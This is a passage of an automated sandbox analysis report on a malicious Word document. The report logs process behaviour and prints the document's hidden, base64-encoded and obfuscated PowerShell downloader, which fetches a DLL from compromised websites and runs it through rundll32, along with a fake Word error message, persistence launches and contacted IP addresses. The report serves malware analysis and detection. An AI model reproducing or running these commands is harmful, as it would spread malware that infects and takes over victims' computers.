Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2308Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000005.00000002.2086528973.0000000000404000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003D55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.49.88.46 80
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 71.72.196.159 80
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $8ZG = [tYpe]("{2}{5}{0}{1}{3}{4}"-f 'TE','m.','Sy','io','.DIrECtORY','S'); $D0Cq = [TYpe]("{2}{1}{0}{3}{4}" -f'sErvICEPo','Tem.nEt.','SYs','iNtma','nAGER') ; $Jbz3yaa=$D53E + [char](64) + $R76P;$G73O=('F'+('0'+'4V')); ( Get-VarIABle ("8Z"+"g") -vAlUeON )::"crE`A`TeDiR`eCt`oRy"($HOME + (('tK'+('L'+'K'+'jl48kr')+'t'+('KLNq'+'m9')+('t'+'y9')+'t'+'KL')-replAce ('tK'+'L'),[CHAr]92));$P43W=(('U_'+'2')+'P'); ( chILdiTeM VarIABlE:d0cq ).vaLue::"s`ecURIt`YpROt`OCoL" = (('Tl'+'s1')+'2');$S82G=(('G9'+'0')+'M');$D6trw02 = (('S9'+'3')+'E');$X6_M=('D3'+'0P');$G6ajv8d=$HOME+(('{0'+'}Kjl48kr'+'{0}Nq'+('m9ty'+'9')+'{0}')-f [CHar]92)+$D6trw02+(('.d'+'l')+'l');$V35U=(('S5'+'_')+'U');$Jitoa2e=(('w]xm[vs'+'://remed'+'ii'+'s.'+'c'+'o'+'m/t/gm2X/@'+'w')+(']x'+'m[v:'+'//ava')+('dn'+'an')+('sa'+'h')+'in'+('.c'+'om')+('/'+'wp'+'-inc')+'lu'+('de'+'s/w/@')+'w'+']'+('x'+'m[')+('v://'+'sol'+'ico')+'n'+('.us'+'/alla'+'m'+'-cy')+('cle'+'-1c4')+('gn'+'/f5')+'z/'+('@'+'w]')+('x'+'m['+'v:/'+'/www.riparazi'+'on'+'i'+'-')+('radi'+'o')+'tv'+'.c'+('om'+'/so')+'ft'+('ac'+'u')+('l'+'ous/'+'DZz/')+'@'+('w'+']xm[')+('v:/'+'/')+('ww'+'w')+('.agr'+'i'+'camp'+'eg')+('gi'+'o'+'cor')+('te'+'como')+'tt'+'o.'+('it'+'/')+('wp'+'-')+('a'+'dm')+('i'+'n'+'/s7'+'p1/@w]'+'xm[')+'v'+'s:'+'//'+'ww'+'w'+('.starl'+'i'+'n')+('gtechs.com'+'/'+'GNM'+'/@w'+']xm[v')+(':'+'/'+'/hellas')+('-d'+'arms'+'tad'+'t.d'+'e')+'/c'+('gi-bin'+'/Z')+'S'+('o'+'o/'))."rEplA`ce"((('w]xm'+'[')+'v'),([array](('ds'+('e'+'wf')),('we'+('vw'
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $8ZG = [tYpe]("{2}{5}{0}{1}{3}{4}"-f 'TE','m.','Sy','io','.DIrECtORY','S'); $D0Cq = [TYpe]("{2}{1}{0}{3}{4}" -f'sErvICEPo','Tem.nEt.','SYs','iNtma','nAGER') ; $Jbz3yaa=$D53E + [char](64) + $R76P;$G73O=('F'+('0'+'4V')); ( Get-VarIABle ("8Z"+"g") -vAlUeON )::"crE`A`TeDiR`eCt`oRy"($HOME + (('tK'+('L'+'K'+'jl48kr')+'t'+('KLNq'+'m9')+('t'+'y9')+'t'+'KL')-replAce ('tK'+'L'),[CHAr]92));$P43W=(('U_'+'2')+'P'); ( chILdiTeM VarIABlE:d0cq ).vaLue::"s`ecURIt`YpROt`OCoL" = (('Tl'+'s1')+'2');$S82G=(('G9'+'0')+'M');$D6trw02 = (('S9'+'3')+'E');$X6_M=('D3'+'0P');$G6ajv8d=$HOME+(('{0'+'}Kjl48kr'+'{0}Nq'+('m9ty'+'9')+'{0}')-f [CHar]92)+$D6trw02+(('.d'+'l')+'l');$V35U=(('S5'+'_')+'U');$Jitoa2e=(('w]xm[vs'+'://remed'+'ii'+'s.'+'c'+'o'+'m/t/gm2X/@'+'w')+(']x'+'m[v:'+'//ava')+('dn'+'an')+('sa'+'h')+'in'+('.c'+'om')+('/'+'wp'+'-inc')+'lu'+('de'+'s/w/@')+'w'+']'+('x'+'m[')+('v://'+'sol'+'ico')+'n'+('.us'+'/alla'+'m'+'-cy')+('cle'+'-1c4')+('gn'+'/f5')+'z/'+('@'+'w]')+('x'+'m['+'v:/'+'/www.riparazi'+'on'+'i'+'-')+('radi'+'o')+'tv'+'.c'+('om'+'/so')+'ft'+('ac'+'u')+('l'+'ous/'+'DZz/')+'@'+('w'+']xm[')+('v:/'+'/')+('ww'+'w')+('.agr'+'i'+'camp'+'eg')+('gi'+'o'+'cor')+('te'+'como')+'tt'+'o.'+('it'+'/')+('wp'+'-')+('a'+'dm')+('i'+'n'+'/s7'+'p1/@w]'+'xm[')+'v'+'s:'+'//'+'ww'+'w'+('.starl'+'i'+'n')+('gtechs.com'+'/'+'GNM'+'/@w'+']xm[v')+(':'+'/'+'/hellas')+('-d'+'arms'+'tad'+'t.d'+'e')+'/c'+('gi-bin'+'/Z')+'S'+('o'+'o/'))."rEplA`ce"((('w]xm'+'[')+'v'),([array](('ds'+('e'+'wf')),('we'+('vw'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwAr